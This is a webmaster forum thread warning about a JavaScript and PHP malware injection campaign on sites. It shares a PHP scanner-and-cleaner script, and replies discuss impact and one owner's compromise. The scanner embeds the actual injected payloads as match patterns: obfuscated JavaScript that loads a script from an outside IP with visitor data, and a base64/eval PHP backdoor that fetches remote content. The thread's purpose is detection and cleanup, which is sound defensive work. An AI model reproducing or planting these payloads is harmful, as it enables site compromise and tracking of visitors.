Better check your JS and PHP files [new malware injects]

[SZNY]

Just wanted to share this with you as it might affect your traffic. Funny thing is that Google doesn't report it yet as badware.

There is a new kind of JS malware virus that injects code to make 1pixel iframes and connects to certain sites.

I just scanned 150 domains and some of my WP installs where infected.

Here is a link from a German coder offering a workable solution. Copy the code in a php file and upload it to the root of your server.

Once done type www.xxxx.xx/filename.php to start scanning your files.

It also disinfects your code. Here the links:
http://forum.nexoneu.com/NXEU.aspx?g=posts&m=3143118
http://blog.insidecomp.com/?p=33#more-33

PHP Code:

<pre><!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>INSIDE Computer MalwareCheck 0.1</title>
</head>
<body>
<h1>Javascript und PHP Files werden auf Befall gecheckt:</h1>
 
<?php
echo '<h2>Startverzeichnis:'.getcwd().'</h2><br/>';
// dir_walk('/hp/ac/ab/vt/www/spd2011', 'showFiles');
$files_checked = 0;
$files_infected = 0;
echo '<table>';
dir_walk(getcwd(), 'checkFiles');
echo '</table>';
 
echo '<h2>Files checked: '.$files_checked.'<br/></h2>';
echo '<h2>Files infected: '.$files_infected.'<br/></h2>';
if ($files_infected == 0)
{
echo 'Alles im gr&uuml;nen Bereich...';
}
 
function dir_walk($start_dir, $func) {
$entries = scandir($start_dir);
foreach ($entries as $entry) {
if ($entry == '.' || $entry == '..') {
/* skip these */
} else if (is_dir($start_dir . '/' .$entry)) {
echo '<tr><td><b>Scanning...'.$start_dir . '/' . $entry.'</b></td></tr>';
dir_walk($start_dir . '/' . $entry, $func);
} else
$func($start_dir . '/' . $entry);
}
}
 
function checkFiles($filename) {
global $html_files;
 
// disindect javascriptFiles
if (strpos($filename, '.js') === (strlen($filename) - 3))
{
echo '<tr><td>.js-File checking: '.$filename.'<td>';
$pattern='var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;';
disinfect($filename, $pattern);
}
if (strpos($filename, '.php') === (strlen($filename) - 4))
{
echo '<tr><td>.js-File checking: '.$filename.'<td>';
$pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
disinfect($filename, $pattern);
}
 
}
function restore_hsc($val){
$val = str_replace('&amp;', '&', $val);
$val = str_replace('&ouml;', '?', $val);
$val = str_replace('&auml;', '?', $val);
$val = str_replace('&uuml;', '?', $val);
$val = str_replace('&lt;', '<', $val);
$val = str_replace('&gt;', '>', $val);
$val = str_replace('&quot;', '"', $val);
return $val;
}
 
function disinfect($filename, $pattern) {
global $files_checked;
$files_checked++;
$pattern=trim(htmlspecialchars($pattern)); //prepare pattern
$lines = file($filename);
$found=0;
for ($i=0; $i<sizeof($lines); $i++) {
$current_line=trim(htmlspecialchars($lines[$i]));
if(strstr($current_line, $pattern)) {
$lines[$i]=str_replace($pattern, "", htmlspecialchars(trim($lines[$i])));
$lines[$i]= preg_replace('/\s\s+/', ' ', $lines[$i]);
$lines[$i]=restore_hsc($lines[$i]);
$found++;
}
}
$lines = array_values($lines);
if ($found >0) {
global $files_infected;
$files_infected++;
$file = fopen($filename, "w");
fwrite($file, implode("\n",$lines));
fclose($file);
touch($file);
echo " <td><span style=\"color:red;\"> is infected. Cured: $found injected objects</span></td></tr>";
}
else {echo " <td><span style=\"color:green;\"> - File is clean</span></td></tr>";}
}
?>
</body>
</html>

[nico-t]

how will this virus affect your server? Will this cause load issues and eventually a mysql crash?

[SZNY]

Well it will cause extra load on your server (makes more connections) plus your sites are flagged as Malware by various AV software apps

[pornguy]

this is hitting Blogs or over all sites in general?


Can you find it by looking at the code of the index or is it hidden?

[SZNY]

Doesn't matter, all sites that are using JS files

[pornguy]

OK thanks

Damn.. More work.

[raymor]

Thanks, I'll add that signature to our scanner. I'll actually be interpreting and reducing the signature to catch other variations if the same thing. The posted code is awefully specific.

[pimpware]

Thanks for the heads up

All check and clean

[blackmonsters]

Cleaning up your files is good but that doesn't fix the problem.

How did that get into your site to begin with is the question.

[SZNY]

Quote:

Originally Posted by blackmonsters

Cleaning up your files is good but that doesn't fix the problem.

How did that get into your site to begin with is the question.

In my case I had some test domains which were not that secured and infected the rest of the server.

All is pretty closed now. Took me some time but all is cleaned and hope it can help others.

[V_RocKs]

crazy h4x0r5

[Darkhorse]

Thanks for this, will have to check mine out.

[harvey]

the cleaning code itself makes my antivirus goes bananas

[FlorianPC]

thanks for the code, i will check my domains too.

[gabe100]

If you don't think you're vulnerable read about my nightmare below. It's quite embarrassing. I don't post much. No one wants to write a story like this, hopefully it helps someone.

I was hit Thanksgiving day of last year. 12 years running adult sites and never a problem. In my case, the permissions on 1 php file within openx were wide open. Permissions don't sync across servers and malware was injected on my splash redirecting to a Russian site. Multiple shells were installed and if you have ever seen your backend/library via a shell with Russian headers and tags, it's the scariest thing ever.

Quite elegant too, all your folders and files are color coded, everything wide open.

The second scariest thing is looking at the code injected on to the page itself. In my case the code was 7 or 8 strange characters, you can't even see the redirect buried at the very bottom of the page. The page is straight HTML, a simple warning page. Super clean. The characters look like the innocent copyright tags.

That code referenced scripts buried far in my file structure.

Ad Words suspended, Banned from Google. Cybercat pulling me, TJ yanked me. Kenny emailing me, Paperstreet emailing me. Pornhub video b gone. Exo paused. NIGHTMARE!

That was my Thanksgiving.

The good part is it didn't last long. Once clean I resubmitted to google and within 5 seconds I was approved and it was like nothing ever happened. All references to us distributing malware within google search vanished.

What saved us was clonebox and Ray, having a great host and my man Konrad. The very early symptoms won't be apparent. First extremely vague warnings from Avast, then AVG then it gets wide out and the messages start rolling in from customers and partners. The nightmare really starts once you get banned from google. All paid SEO Gone, all organic SEO replaced with malware warnings.

Multiple servers on lockdown, thousands of folders each with perfect permissons set and yet 1 file wide open.

Looking back it's probably best it happened because other measures are now in place to ensure that never happens again.

Check your permissions and and at the very least, get a script installed that alerts you to any changes on your boxes. Having a firewall on your FTP/SSH isn't enough. These new malware injections are pretty clever.

Rather embarrassing, I had to learn the hard way. Hopefully you won't have to.